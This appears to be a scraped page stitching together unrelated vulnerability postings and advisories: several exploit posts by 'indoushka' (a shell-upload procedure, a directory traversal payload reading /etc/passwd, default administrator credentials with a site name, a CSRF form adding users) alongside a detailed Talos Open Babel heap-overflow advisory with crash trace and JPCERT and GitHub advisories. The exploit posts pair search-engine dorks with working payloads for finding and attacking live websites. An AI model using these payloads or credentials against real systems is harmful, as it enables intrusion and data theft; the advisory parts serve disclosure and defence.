REDCap 12.0.26 LTS and 12.3.2 Standard allows SQL Injection via scheduling, repeatforms, purpose, app_title, or randomization.

CVE-2023-37361: Trustwave Security Advisories

CMS Ultimate Solutions DreamSus version 1.4 suffers from a remote shell upload vulnerability.

**CMS Ultimate Solutions DreamSus 1.4 Shell Upload**

Posted Jul 24, 2023

Authored by indoushka

CMS Ultimate Solutions DreamSus version 1.4 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell

SHA-256 | 687fc9626b0a4c7e675cd7007c558b29ceea1784dee6326f9ae2ef2465dc6ffe

Download | Favorite | View

**CMS Ultimate Solutions DreamSus 1.4 Shell Upload**

    ====================================================================================================================================| # Title     : CMS Ultimate Solutions DreamSus v1.4 unrestricted file upload Vulnerability                                        || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : http://dreamsus.com                                                                                                |  | # Dork      : intext:''Designed and Developed by Dreams Ultimate Solutions'' site:edu.in                                         |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine .[+] http://127.0.0.1/spcollegejejurieduin/add_testimonial.php <==== Fill in the blanks and choose your malicious file and upload[+] http://127.0.0.1/spcollegejejurieduin/uploads/testimonial/Ev!l.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,739)
*   Arbitrary (16,155)
*   BBS (2,859)
*   Bypass (1,735)
*   CGI (1,025)
*   Code Execution (7,238)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,364)
*   Encryption (2,365)
*   Exploit (51,634)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (891)
*   Java (3,036)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,666)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,666)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,637)
*   Security Tool (7,876)
*   Shell (3,177)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,307)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,711)
*   Web (9,622)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,866)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,994)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,794)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,241)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,599)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,269)
*   UnixWare (186)
*   Windows (6,565)
*   Other

CMS Ultimate Solutions DreamSus 1.4 Shell Upload

An out-of-bounds write vulnerability exists in the CSR format title functionality of Open Babel 3.1.1 and master commit 530dbfa3. A specially crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.

**SUMMARY**

An out-of-bounds write vulnerability exists in the CSR format title functionality of Open Babel 3.1.1 and master commit 530dbfa3. A specially crafted malformed file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.

**CONFIRMED VULNERABLE VERSIONS**

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Open Babel 3.1.1  
Open Babel master commit 530dbfa3

**PRODUCT URLS**

Open Babel - https://openbabel.org/

**CVSSv3 SCORE**

9.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-120 - Buffer Copy without Checking Size of Input (‘Classic Buffer Overflow’)

**DETAILS**

Open Babel is a popular library for converting chemical file formats, currently supporting about 130 different file formats. It implements bindings for several programming languages. Because of the nature of the library, and since there are many online chemical format converters and molecule viewers which might be using Open Babel in their backend for parsing and conversion, we consider this software as potentially accessible via network.

Open Babel ships a simple converter application called obabel that can be used to trigger the issue described in this advisory. obabel supports -i and -o parameters, which select the input and output formats to perform the conversion. obabel supports multiple input and output files (as does the Open Babel library itself): this technically allows multiple vulnerabilities to trigger in sequence, which in turn could make some vulnerabilities easier to exploit. In this advisory, however, we focus on only one input file and a corresponding output file.

When a single input file and output file are supplied, obabel.cpp records the input and output formats (if supplied), and calls OBConversion::FullConvert in obconversion.cpp. Inside this function, there’s a call to OpenAndSetFormat, which uses FormatFromExt to derive the input format from the filename extension if no -i parameter was supplied. Similarly, OpenInAndOutFiles can be used to derive both input and output formats from the filename extensions when none are supplied.

Depending on how the obabel application is invoked, different paths could actually take place. Eventually, pInFormat and pOutFormat (of base class OBFormat) objects are allocated, which are instances of the classes that implement the selected input and output formats.

The code then proceeds with a call to OBConversion::Convert, which eventually leads to calling pInFormat->ReadMolecule and pOutFormat->WriteMolecule.

In this advisory, we describe an issue in the CSR file format (formats/CSRformat.cpp.cpp) when writing an output file via WriteMolecule.

        bool CSRFormat::WriteMolecule(OBBase* pOb, OBConversion* pConv)
        {
          OBMol* pmol = dynamic_cast<OBMol*>(pOb);
          if (pmol == nullptr)
            return false;
    
          //Define some references so we can use the old parameter names
          ostream &ofs = *pConv->GetOutStream();
          OBMol &mol = *pmol;
    
          //  if (FirstTime)
          if(pConv->GetOutputIndex()==1)
            {
              WriteCSRHeader(ofs,mol);
              //FirstTime = false;
              MolCount=1;
            }
    
    [1]   WriteCSRCoords(ofs,mol);
          MolCount++;
    
          return(true);
        }
    

Let’s follow the call to WriteCSRCoords at \[1\].

        void CSRFormat::WriteCSRCoords(ostream &ofs,OBMol &mol)
        {
          int the_size,jconf;
          double x,y,z,energy;
          char title[100];
          char *tag;
    
          the_size = sizeof(int) + sizeof(double) + (80 * sizeof(char));
    
          jconf = 1;
          energy = -2.584565;
    
    [2]   snprintf(title, 80, "%s:%d",mol.GetTitle(),MolCount);
    [3]   tag = PadString(title,80);
    
          WriteSize(the_size,ofs);
          ofs.write((char*)&jconf,sizeof(int));
          ofs.write((char*)&energy,sizeof(double));
          ofs.write(tag,80*sizeof(char));
          WriteSize(the_size,ofs);
    
          WriteSize(mol.NumAtoms()*sizeof(double),ofs);
    

At \[2\], the molecule’s title is retrieved, and the title buffer is filled. Then PadString is called, passing title and 80 as size \[3\].

        char* CSRFormat::PadString(char *input, int size)
        {
          char *output;
    
    [4]   output = new char[size];
          memset(output, ' ', size);
    [5]   strncpy(output, input, strlen(input));
          output[ size - 1] = '\0';
          return(output);
        }
    

At \[4\], a new char array of size size is allocated, and at \[5\] it is filled with input using strncpy. The maximum size passed to strncpy is not related to the destination buffer size. Rather, it’s the length of the input (that is, the title), which is potentially controlled by the input file. If a long title (longer than 80 characters) is supplied, an out-of-bounds write on the heap will happen, which can lead to arbitrary code execution.

**Crash Information**

    $ ./bin/obabel -i caccrt strncpy.oobw.caccrt_csr -o csr
    =================================================================
    ==1329606==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf560ed24 at pc 0xf79ff8c4 bp 0xffffb9e8 sp 0xffffb5c0
    WRITE of size 169 at 0xf560ed24 thread T0
        #0 0xf79ff8c3 in __interceptor_strncpy ../../../../src/libsanitizer/asan/asan_interceptors.cpp:470
        #1 0xf4f3b6a4 in OpenBabel::CSRFormat::PadString(char*, int) ./src/formats/CSRformat.cpp:192
        #2 0xf4f3b7d0 in OpenBabel::CSRFormat::WriteCSRHeader(std::ostream&, OpenBabel::OBMol&) ./src/formats/CSRformat.cpp:105
        #3 0xf4f3c86a in OpenBabel::CSRFormat::WriteMolecule(OpenBabel::OBBase*, OpenBabel::OBConversion*) ./src/formats/CSRformat.cpp:89
        #4 0xf7516072 in OpenBabel::OBMoleculeFormat::WriteChemObjectImpl(OpenBabel::OBConversion*, OpenBabel::OBFormat*) ./src/obmolecformat.cpp:174
        #5 0xf63c355c in OpenBabel::OBMoleculeFormat::WriteChemObject(OpenBabel::OBConversion*) ./include/openbabel/obmolecformat.h:120
        #6 0xf72a23e6 in OpenBabel::OBConversion::Convert() ./src/obconversion.cpp:607
        #7 0xf72c717a in OpenBabel::OBConversion::Convert(std::istream*, std::ostream*) ./src/obconversion.cpp:481
        #8 0xf72cf4f3 in OpenBabel::OBConversion::FullConvert(std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >&) ./src/obconversion.cpp:1514
        #9 0x565594ea in main ./tools/obabel.cpp:370
        #10 0xf77923b4 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #11 0xf779247e in __libc_start_main_impl ../csu/libc-start.c:389
        #12 0x5655c356 in _start (./bin/obabel+0x7356)
    
    0xf560ed24 is located 0 bytes to the right of 100-byte region [0xf560ecc0,0xf560ed24)
    allocated by thread T0 here:
        #0 0xf7a58bb3 in operator new[](unsigned int) ../../../../src/libsanitizer/asan/asan_new_delete.cpp:98
        #1 0xf4f3b67c in OpenBabel::CSRFormat::PadString(char*, int) ./src/formats/CSRformat.cpp:190
        #2 0xf4f3b7d0 in OpenBabel::CSRFormat::WriteCSRHeader(std::ostream&, OpenBabel::OBMol&) ./src/formats/CSRformat.cpp:105
        #3 0xf4f3c86a in OpenBabel::CSRFormat::WriteMolecule(OpenBabel::OBBase*, OpenBabel::OBConversion*) ./src/formats/CSRformat.cpp:89
        #4 0xf7516072 in OpenBabel::OBMoleculeFormat::WriteChemObjectImpl(OpenBabel::OBConversion*, OpenBabel::OBFormat*) ./src/obmolecformat.cpp:174
        #5 0xf63c355c in OpenBabel::OBMoleculeFormat::WriteChemObject(OpenBabel::OBConversion*) ./include/openbabel/obmolecformat.h:120
        #6 0xf72a23e6 in OpenBabel::OBConversion::Convert() ./src/obconversion.cpp:607
        #7 0xf72c717a in OpenBabel::OBConversion::Convert(std::istream*, std::ostream*) ./src/obconversion.cpp:481
        #8 0xf72cf4f3 in OpenBabel::OBConversion::FullConvert(std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >&, std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >&, std::vector<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> >, std::allocator<std::__cxx11::basic_string<char, std::char_traits<char>, std::allocator<char> > > >&) ./src/obconversion.cpp:1514
        #9 0x565594ea in main ./tools/obabel.cpp:370
        #10 0xf77923b4 in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/asan/asan_interceptors.cpp:470 in __interceptor_strncpy
    Shadow bytes around the buggy address:
      0x3eac1d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x3eac1d60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x3eac1d70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x3eac1d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x3eac1d90: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
    =>0x3eac1da0: 00 00 00 00[04]fa fa fa fa fa fa fa fa fa fd fd
      0x3eac1db0: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa
      0x3eac1dc0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd
      0x3eac1dd0: fd fa fa fa fa fa fa fa fa fa fd fd fd fd fd fd
      0x3eac1de0: fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa fa
      0x3eac1df0: fd fd fd fd fd fd fd fd fd fd fd fd fd fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    

**Exploit Proof of Concept**

To show how to control the title and trigger this vulnerability, let’s use the “Cacao Cartesian format” as input, to easily choose a title which is independent from the input filename:

        bool CacaoFormat::ReadMolecule(OBBase* pOb, OBConversion* pConv)
        {
    
          OBMol* pmol = pOb->CastAndClear<OBMol>();
          if (pmol == nullptr)
            return false;
    
          //Define some references so we can use the old parameter names
          istream &ifs = *pConv->GetInStream();
          OBMol &mol = *pmol;
    [6]   mol.SetTitle( pConv->GetTitle()); //default title is the filename
    
          char buffer[BUFF_SIZE];
          int natoms;
          double A,B,C,Alpha,Beta,Gamma;
          matrix3x3 m;
    
    [7]   ifs.getline(buffer,BUFF_SIZE);
    [8]   mol.SetTitle(buffer);
          ifs.getline(buffer,BUFF_SIZE);
    [9]   sscanf(buffer,"%d",&natoms);
          ...
    

This format has a default title taken from the filename \[6\]. However, the title can be freely chosen at \[7, 8\], in order to use long titles for easier exploitation. At \[9\] we should specify at least 1 atom, to make sure WriteMolecule is called, and satisfy additional fields in this specific input format, in order to eventually trigger the vulnerability in CSRFormat.

**VENDOR RESPONSE**

Since the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Cisco’s Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor\_vulnerability\_policy.html

**TIMELINE**

2022-12-20 - Initial Vendor Contact  
2023-01-12 - Vendor Disclosure  
2023-07-21 - Public Release

Discovered by Claudio Bozzato of Cisco Talos.

CVE-2022-41793: TALOS-2022-1667 || Cisco Talos Intelligence Group

WordPress ChurcHope Responsive Themes version 4.7.x suffers from a directory traversal vulnerability.

**WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal**

Posted Jul 21, 2023

Authored by indoushka

WordPress ChurcHope Responsive Themes version 4.7.x suffers from a directory traversal vulnerability.

tags | exploit, file inclusion

SHA-256 | 5725a62c968e651e09b1218973491c6cf875301d455e111d6a9f075de9cbe5f8

Download | Favorite | View

**WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal**

    ====================================================================================================================================| # Title     : WordPress - ChurcHope Responsive Themes 4.7.x Directory Traversal Vulnerability                                    || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : http://themeforest.net/item/churchope-responsive-wordpress-theme/2708562                                           |  | # Dork      : "/wp-content/themes/churchope/lib/"                                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /wp-content/themes/churchope/lib/downloadlink.php?file=../../../../../../../../../etc/passwd[+] http://127.0.0.1/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../../../../../../etc/passwdGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,734)
*   Arbitrary (16,154)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,363)
*   Encryption (2,365)
*   Exploit (51,626)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,034)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,664)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,664)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,306)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,710)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,862)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,237)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,597)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

WordPress ChurcHope Responsive Themes 4.7.x Directory Traversal

CMS NEXIN version 2.0 appears to leave default credentials installed after installation.

**CMS NEXIN 2.0 Insecure Settings**

Posted Jul 21, 2023

Authored by indoushka

CMS NEXIN version 2.0 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | 25b10702af932a169c8f962ba428cb35c1dcfb81a0c4d0c73e21de4f9e2d2054

Download | Favorite | View

**CMS NEXIN 2.0 Insecure Settings**

    ====================================================================================================================================| # Title     : CMS NEXIN engine v2.0 Insecure Settings Vulnerability                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               || # Vendor    : http://www.composeit.hu/                                                                                           |  | # Dork      : NEXIN engine v2.0                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave a default administrative account in place post installation.[+] Panel : http://wlugashotelcom/admin/[+] User : root & pass : job314Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,734)
*   Arbitrary (16,154)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,363)
*   Encryption (2,365)
*   Exploit (51,626)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,034)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,664)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,664)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,306)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,710)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,862)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,237)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,597)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

CMS NEXIN 2.0 Insecure Settings

Buzzy News Viral Lists Polls and Videos version 2.0 appears to leave default credentials installed after installation.

**Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings**

Posted Jul 21, 2023

Authored by indoushka

Buzzy News Viral Lists Polls and Videos version 2.0 appears to leave default credentials installed after installation.

tags | exploit

SHA-256 | ef0029a51004a0f4fd1207577f144340dffe6a0657f6ace9160fd98579a7d596

Download | Favorite | View

**Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings**

    ======================================================================================================================================| # Title     : Buzzy - News Viral Lists Polls and Videos V 2.0 Insecure Settings Vulnerability                                      || # Author    : indoushka                                                                                                            || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(64-bit)                                               || # Vendor    : https://codecanyon.net/item/buzzy-news-viral-lists-polls-and-videos/13300279?s_rank=4                                |  | # Dork      : "buzzy /profile/admin/ Copyright © Buzzy. All rights reserved."                                                      |======================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  appears to leave default credentials installed after installation.[+]  Use Admin : admin@admin.com & Pass : admin[+]  http://127.0.0.1/clickhungamacom/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,734)
*   Arbitrary (16,154)
*   BBS (2,859)
*   Bypass (1,733)
*   CGI (1,025)
*   Code Execution (7,236)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,334)
*   DoS (23,363)
*   Encryption (2,365)
*   Exploit (51,626)
*   File Inclusion (4,209)
*   File Upload (967)
*   Firewall (821)
*   Info Disclosure (2,755)
*   Intrusion Detection (890)
*   Java (3,034)
*   JavaScript (851)
*   Kernel (6,641)
*   Local (14,428)
*   Magazine (586)
*   Overflow (12,664)
*   Perl (1,423)
*   PHP (5,138)
*   Proof of Concept (2,337)
*   Protocol (3,583)
*   Python (1,531)
*   Remote (30,664)
*   Root (3,575)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,636)
*   Security Tool (7,874)
*   Shell (3,176)
*   Shellcode (1,212)
*   Sniffer (894)
*   Spoof (2,196)
*   SQL Injection (16,306)
*   TCP (2,397)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,710)
*   Web (9,621)
*   Whitepaper (3,748)
*   x86 (961)
*   XSS (17,862)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,993)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,793)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (349)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,237)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (484)
*   RedHat (13,597)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,755)
*   UNIX (9,267)
*   UnixWare (186)
*   Windows (6,565)
*   Other

Buzzy News Viral Lists Polls And Videos 2.0 Insecure Settings

CMS Contabil Bandeirantes version 1.0.0 suffers from a cross site request forgery vulnerability.

======================================================================================================================================  
| # Title     : CMSContábil Bandeirantes V 1.0.0 CSRF Vulnerability                                                                  |  
| # Author    : indoushka                                                                                                            |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 61.0.1 (32-bit)                                              |  
| # Vendor    : https://scriptmafia.org/                                                                                             |    
======================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine .

[+] Go to the line 12.

[+] Set the target site link Save changes and apply . 

[+] infected file : /admin/addUser.php 

[+] Save code as poc.html 

<section id="main" class="column" style="height: 680px;">

        <h4 class="alert_info">Necessário preencher todos os campos.</h4>  
        

        <article class="module width_full">  
      <form action="http://127.0.0.1/cbandeirantescombr/admin/addUser.php" method="post" enctype="multipart/form-data" name="cadastroUser">  
        <header><h3>Adicionar Usuários</h3></header>

                      <div class="module_content">  
                <fieldset>  
                  <label>Nome</label>  
                  <input name="nome" id="nome" value="" type="text">  
                </fieldset>  
                <fieldset>  
                  <label>Email</label>  
                  <input name="email" id="email" value="" type="text">  
                </fieldset>  
                <fieldset>  
                  <label>Senha</label>  
                  <input name="senha" id="senha" value="" type="text">  
                </fieldset>  
                <div class="clear"></div>  
            </div>    
        <footer>  
          <div class="submit_link">  
            <input id="limpar" name="limpar" value="limpar" type="submit">  
            <input name="cadastrar" value="Cadastrar" class="alt_btn" type="submit">  
          </div>  
        </footer>  
      </form>    
    </article>

                    <div class="spacer"></div>  
  </section>

  Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |  
=======================================================================================================================================

CMS Contabil Bandeirantes 1.0.0 Cross Site Request Forgery

Cross-site request forgery (CSRF) vulnerability in TS Webfonts for SAKURA 3.1.2 and earlier allows a remote unauthenticated attacker to hijack the authentication of a user and to change settings by having a user view a malicious page.

Published:2023/07/20  Last Updated:2023/07/20

**Overview**

WordPress Plugin "TS Webfonts for SAKURA" provided by SAKURA internet Inc. contains multiple vulnerabilities.

**Products Affected**

**CVE-2023-32624**

*   TS Webfonts for SAKURA 3.1.0 and earlier

**CVE-2023-32625**

*   TS Webfonts for SAKURA 3.1.2 and earlier

**Description**

WordPress Plugin "TS Webfonts for SAKURA" provided by SAKURA internet Inc. contains multiple vulnerabilities listed below.

*   **Cross-site scripting (CWE-79)** - CVE-2023-32624
    
    CVSS v3
    
    CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    
    **Base Score: 6.1**
    
    CVSS v2
    
    AV:N/AC:H/Au:N/C:N/I:P/A:N
    
    **Base Score: 2.6**
    
*   **Cross-site request forgery (CWE-352)** - CVE-2023-32625
    
    CVSS v3
    
    CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
    
    **Base Score: 4.3**
    
    CVSS v2
    
    AV:N/AC:H/Au:N/C:N/I:P/A:N
    
    **Base Score: 2.6**
    

**Impact**

*   An arbitrary script may be executed on the web browser of the user who is logging in to the WordPress using the plugin - CVE-2023-32624
*   If a user with the administrative privilege views a malicious page while logging in to the WordPress using the plugin, settings may be changed without user's intention - CVE-2023-32625

**Solution**

**Update the plugin**  
Update the plugin according to the information provided by the developer.  
The developer addressed these vulnerabilities in the following versions:

*   CVE-2023-32624:
    *   TS Webfonts for SAKURA 3.1.1
*   CVE-2023-32625:
    *   TS Webfonts for SAKURA 3.1.3

**Vendor Status**

**References**

**JPCERT/CC Addendum**

**Vulnerability Analysis by JPCERT/CC**

**Credit**

SAKURA internet Inc. reported these vulnerabilities to IPA to notify users of the solutions through JVN. JPCERT/CC and SAKURA internet Inc. coordinated under the Information Security Early Warning Partnership.

**Other Information**

CVE-2023-32625: Multiple vulnerabilities in WordPress Plugin "TS Webfonts for SAKURA"

A Cross-Site Request Forgery (CSRF) in the Admin portal of Cockpit CMS v2.5.2 allows attackers to execute arbitrary Administrator commands.

**Cockpit CMS Cross-Site Request Forgery vulnerability**

Moderate severity GitHub Reviewed Published Jul 20, 2023 to the GitHub Advisory Database • Updated Jul 21, 2023

Tag

#csrf